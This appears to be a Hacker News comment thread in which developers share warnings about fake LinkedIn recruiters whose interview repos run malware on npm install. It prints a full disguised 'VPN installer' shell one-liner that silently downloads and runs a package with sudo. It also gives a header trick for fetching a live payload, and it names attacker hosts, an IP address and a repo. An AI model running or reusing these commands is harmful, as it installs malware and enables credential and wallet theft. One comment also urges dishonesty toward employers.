Same story for me. I gave them the repo link and messages. Nothing 2 weeks later. Now I just block them and even then, you can't select a proper reason (there's no "other" field for a block), so I just say they're impersonating someone and leave it at that. We cannot let this become the primary site for job postings.
This is uncomfortably close to a normal interview task now.
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run npm install before thinking twice, especially if they were tired or looking for work.
The interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
At least now there is a blog post that you can link to and say "Sorry, but I don't run npm install locally because of the risk of phishing attacks."
A skilled employee would never skip that step, why should you do so in an interview context? Skipping that step seems like a task failure to me just as much as any other part of the question from an interviewer perspective. Maybe I shouldn't hire the guy that blindly runs code just because someone "senior" to them asks.
They seem to be using the same domain for multiple targets: reddit thread from 3 months ago:
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bells start ringing when they insist that you run their sh*t locally.
Similar for me. One was for an overly well-paid position. I always run (p)npm audit before running npm repos, so lots of issues were found. I tried to fix them but I would have gone over the time limit. So I asked the recruiter about it and whether it made sense to run it in an isolated VM. No answer...
The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
The big red flag should be giving github access before signing any contracts.
They mostly use public repositories though.
Yeah, but that should also be a red flag.
This happened to me too. A few things about the process made me suspicious. I downloaded the repo and told Claude to "find the malware". Took about 15 seconds. Remote code execution that would have run upon npm install, iirc. Many layers of obfuscation. In implementation, a little different to the OP's situation but there are similarities. It was a "crypto startup". Maybe they think people in the crypto world are more forgiving of idiosyncrasies in the recruiting process? I reported the recruiter's profile to LinkedIn, with extensive details. They said they wouldn't look into it unless I opened a ticket in some other part of their site, lol. However, it seems they got onto it, or someone else complained, because I can't find the recruiter "alice kenny" anymore. But the "company" she was recruiting for is still live:
https://www.linkedin.com/company/blockchainaustraliasolution...
They target people looking at crypto startups because they're after wallets and seed phrases
Hm, the url returns a png. Did he obscure the actual url? Couldn't get it to send me json or js...
Update: found a clone of the repo on github and got the payload, all you have to do is add a header `bearrtoken: logo`
It's obfuscated, I will feed it to qwen to see what can be gleaned.
Same here.
I tried content-types and user-agents, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response JSON. It's a 307, but the result is a PNG.
I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
Got it after adding the header: `bearrtoken: logo`.
Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.
So I fed it to Qwen. It seems to think it's just a downloader and persistence mechanism for another payload. I will try to download that too and see what Qwen thinks of it.
Thanks for following down the rabbit hole, let us know what you find! Also... why Qwen?
> why qwen
I have it running locally, and I don't want to add credentials to the VM with the malware.
According to qwen:
It's cross platform
It has a bunch of persistence mechanisms.
It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev. I verified that I got the secondary payload.
This pack looks like a python 3.10 environment along with an executable called cupsd.
And downloads another js script from http://138.201.125.58:1224/client/99/77
That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
Nothing to do with npm itself. This sort of scam would have worked with many different technologies, even a Makefile.
Cat related technology like noms and toe beans are immune to this exploit. =3
Because uh every OS on earth has the exact same vulnerabilities? How are you supposed to stop a user from downloading something random from the internet and running it?
Some POSIX-like systems mount /home with noexec in fstab.
Practically, most systems leave it off because many out-of-band user space script language package ecosystems stop working. =3
There are also adaptive application firewalls that are user friendly.
https://github.com/evilsocket/opensnitch
noexec clearly isn't going to help if you run untrusted JavaScript...
Sometimes, but nodejs or npm won't work properly without the headless chromium VM, and would need bypassing local file-access security-sandbox restrictions most normal system Web-browsers enforce by default.
If root installs OS-supported VM packages, then it would be pointless to complain that the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
npm is hard to avoid, as other ecosystems have integrated it as a cross-platform build/installer script bootstrap.
Indeed, all things nodejs are usually a dumpster fire at a hair salon, but the real point here was people always inherit whatever the previous cheapest labor built at that office. Also, usually people don't get to make architectural decisions for a long time. =3
How does npm differ from any other package manager in that sense?
They typically don't execute arbitrary code when setting up the project.
If a build tool has any support for tests, it can execute arbitrary code, since that is what tests are. I am quite sure Maven's pom.xml can install a binary jar into the local .m2/repository and later use it as a plugin during the generate-sources phase, and that is something an IDE will want to do when opening a project. NPM attacks are really a product of its popularity (and the update churn the community has already got used to).
FYI, npm 12 will have more secure defaults https://github.blog/changelog/2026-06-09-upcoming-breaking-c... but it will be a while before the ecosystem catches up, and npm's reputation is already damaged.
I've pretty much had the same thing happen to me on Fiverr about 10 months ago.
I even did a write-up. It was one of the first reverse engineerings I've done. https://gist.github.com/Throvn/97fcb4981c1ff66725d4b2e408ba0...
Maybe Mac will finally get a decent virtualization framework. Downloading random unprotected scripts from the internet, like it is 1995, is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
Or running random curl | bash scripts from GitHub, AUR, NPM is just as bad, but many developers here still have dubious assumptions about this bad practice.
The last few weeks tell us how bad this is, especially with all the mini Shai-Huluds running around.
>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
It's ok, the guy with glasses from the Daily Show said it's ok.
> Maybe Mac will finally get decent virtualization framework.
it already has, you can configure intellij to run npm commands in a Docker container.
I'm not sure if anyone will read this, but I consider myself pretty savvy, having been on the internet for decades; however, I nearly succumbed to a highly complex LinkedIn "interview with video call just to get me to install malware".
It was the most bizarrely long, roundabout way to get me to install malware I had ever witnessed. I couldn't fathom it was real; I mean, they interviewed me for half an hour. Now you might think I'm paranoid, however it was obvious: their camera was off (personal preference, they said) and well, I allowed it... only for other eventual straws to break the camel's back, and I realised "oh, uh oh, this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction".
I was flummoxed, tbh. I couldn't believe it, as the approach had been very organic, through LinkedIn DMs; it was just that eventually I realised I had succumbed to "yes men" (the only thing that would get past my already strict job filters, ironically) to allow myself into such a compromising situation.
The only question I had is how did they do such a smooth, complex manoeuvre, and then I realised... oh, they just used AI to come up with the plan and implementation.
Yeah, the camera-off thing has happened to me too, and it should be a red flag to anyone in an interview situation.
This is a common one. I've had at least half a dozen of them. If I'm bored, I play along, and then play difficult and dumb and see how long it takes until they give up.
Some of these will happily get on "interview" calls etc.
For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
All they want is to get your keys and empty your wallet
I guess that might be a reason to use the web3/crypto angle to get people who are unlikely to have crypto wallets to self-select out...
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
A long time ago, I worked for an ISP that sent out the famous "we'll never ask for your passwords" email. Then, about 3 weeks in, they sent out emails asking people for their passwords. If you told me that this was a happy ending, he sent in a check and they sent a laptop and after 2 paychecks released his deposit, I wouldn't be shocked. Some companies are run by idiots. I even know that most companies could probably cover scammed hardware with business insurance, but then I wonder how many flying-by-the-seat-of-their-pants outfits don't have the insurance.
Hoping he wasn't scammed.
My favorite was a job posting through a company called ladders
Saw it in the soup of other job posting, went to apply, it took me to some other job portal, ok whatever, this is normal, filled out all the forms as one does, and then reached the end and the site told me they'd submitted my application, and here were some other jobs I could apply to with the same application. Useful, right?
Click any of them, or anywhere else on the page, and a full screen modal takeover comes up, demanding you pay $50/application.
I closed the tab, but watched the email they sent me from the first job app. It went nowhere. Eventually applied to the company directly, on their job portal, and when I got to a real recruiter later, they said they never received my first app. My guess is ladders never even sent it and wouldn't until I paid up
Best part was ladders continued to spam my email inbox with job application invitations, each one wanting the same $50, until I blocked the fastmail throw away
I also had a "recruiter" reach out to me about a "role I'd be a good fit in". Made the meeting, and immediately some red flags. Audio and video were about 2 seconds out of sync. Guy then proceeded to try and pitch me on a similar job board, with the same $50/application cost, only this one had a 10 weeks salary cost on placement as well
I told him I wasn't interested.
Maybe these are just more traditional scams or whatever, not the malware type the op is about, but they still piss me off
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
Hoisted by their own petard vibes.
I had a similar experience, just by email.
https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...
It was likely DPRK.
I work in crypto and this is happening practically every other day. I refuse anyone on LinkedIn that I don't know personally and who has web3 or crypto anywhere in their description. It's all fake accounts with fake job offers. It's a pretty well-known scam.
Worth noting that this isn't just a risk with npm or other package managers. If you're using LLM agents in the directory of a cloned repo, there are risks in skills, hooks, etc. automatically executing.
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
I was a victim of this attack on Friday. The interviewer had a russian / east European accent.
"Recruiters" are getting sophisticated.
I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
Turns out they were just fishing for inside information on my employer's end customer's applications.
The US government should be involved in protecting the US from this kind of international crime and corporate espionage.
Just a thought, but no call to action from me.
I don't have a LinkedIn profile.
~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.
In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
I have a profile, but you couldn't pay me to look at the feed.
I use a Firefox extension to block the feed
Wait until the extension gets acquired by a third party and turns into malware
What part of applying to LinkedIn jobs requires you to look at the feed?
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
You can actually test it yourself. The actual URL is in the post and the website is still up.
Seems like it actually loads a PNG image now, maybe the npm script adds some additional headers to trigger the payload.
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
Compromise of developer's access, API keys, etc. in order to create a supply chain attack.
I cannot imagine a situation where some random person messages me on LinkedIn asking me to solve a coding challenge, and I do anything other than block them.
I'm guessing you've never experienced the enormous pressure of needing to find a job to buy food and clothes for your family. That's good, I'm glad that you don't know that feeling. But if you did, you'd know how easy it could be for a person to start feeling more and more desperate for any kind of lifeline.
There is still no chance that my first reaction to a random stranger asking me to do work for them is "sure", without building some sort of connection. Granted, that means I could still get phished via a coding exercise, but it would require a bit more effort on the attacker's part.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Martin from GitHub here - the offending repos have been taken down, but the article from Roman is still very much worth reading to understand the attack vector attempted.
I'm seeing the same. Worth flagging that maintainers seem to be a specific target now, not just job seekers. If you've got commit access to anything popular, backdoors like this become a lot more dangerous, because the supply-chain payoff is much bigger than your laptop
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
> I’ve heard of these attacks and read about them on HN
And, I am reading this on HN right now. What a coincidence!
I read a lot about social engineering and how the human being is considered the weakest layer in the security chain but this is the first time I've came across this pattern. Eye opening indeed.
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
> recruiter at a small crypto startup
That's your first red flag right there.
Smells like the Contagious Interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings and Claude hooks for malicious code execution.
I didn't read everything, but I had a DM offering a gig a few weeks ago, and asked me to check out a React site/app. I cloned it and it looked dubious; replied I pass.
I had a [similar](https://dev.shivagaire.com.np/linkedin-client-rce-backdoor-n...) encounter before. Jobs are scarce and this kind of targeted dev attack seems to be more frequent these days.
Oh my goodness! I had this play out as is on Friday. I luckily got on the Zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled...
Good man, knows what he is doing.
FWIW, I only run AI CLI tools on a Hostinger VPS, never on my personal device. It also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. It's a very fun workflow for experimentation. Still trying to work out the kinks to make it easier.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Come on, github...
> but on a more tired or rushed day
This has nearly gotten me before, and I got lucky.
LinkedIn offers are mostly either scams or just for promotions.
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
> but on a more tired or rushed day, I could easily have run npm install before thinking it through
> So far nothing has changed and the code is still up.
That sucks, but it seems to be par for the course, these days.
How about running that backdoor from a honeypot and check what it is trying to do?
Seen similar: https://www.theregister.com/security/2026/04/23/dev-targeted...
I reported it and it seems like the repo no longer exists
This is the first time I have heard of this type of scam. So horrible; people need to be careful on both GitHub and LinkedIn.
They’re quickly becoming the new sourceforge
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
Western governments should treat large-scale scammers and the countries that protect them as an act of war.
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
I've got more than a handful of these offers so I decided to never install anything and politely decline such offers.
Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Stay vigilant out there everyone.
> Such people are the worst of the worst of humanity.
I don't know. There's a plentiful supply of bad humans.
Anyone who preys on people who are desperate and hurting is certainly among the worst, though.
It would have been game over for me.
Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/
Would highly recommend running any repo in an isolated environment like a vm
I wonder if antivirus software would catch this.
Damned, there is a market for an "antivirus for developers".
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
So the backdoor isn’t in the offer but came per offer
> so just installing dependencies executes the backdoor.
How anybody in their right mind still uses this tech stack is beyond me.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Remember to treat every site on the internet as an adversary, even if they weren't in the past.
I'm a simple man. I see cryptocurrency and I move away from what looks like a social scam.
Sure, that might have been the one chance in a life time to easy big money. Or just a path to financial big troubles.
More reasons for me to dislike linked-in. I have an account. I hate it.
the entire internet is just phishing at this point
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
Or, you know... money
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```
Yeah, no. Be careful out there.
By the way, here's the scammer's "company website": https://jtwllc.com/
Superficially looks legit until you start investigating the finer details.
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those who don't value it.
- Don't stay complacent always innovate.
> Don't stay honest to those who don't value it.
IMO you are either honest or you are not
If you are honest with people who don't want to hear the truth, you are going to be dishonest with people when they want the truth.
That doesn't follow.
you'll figure it out
LinkedIn is a cesspool of scams now.
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
It's become Facebook, too. I constantly see posts about the MAGA issue of the day.
Once again I'll state my opinion, don't use linkedin. It's a social media site not an employment/recruitment resource.
Yet another reason to be reluctant to even discuss linkedin job offers
now imagine if you were like the rest of us and didn’t write a blog post about it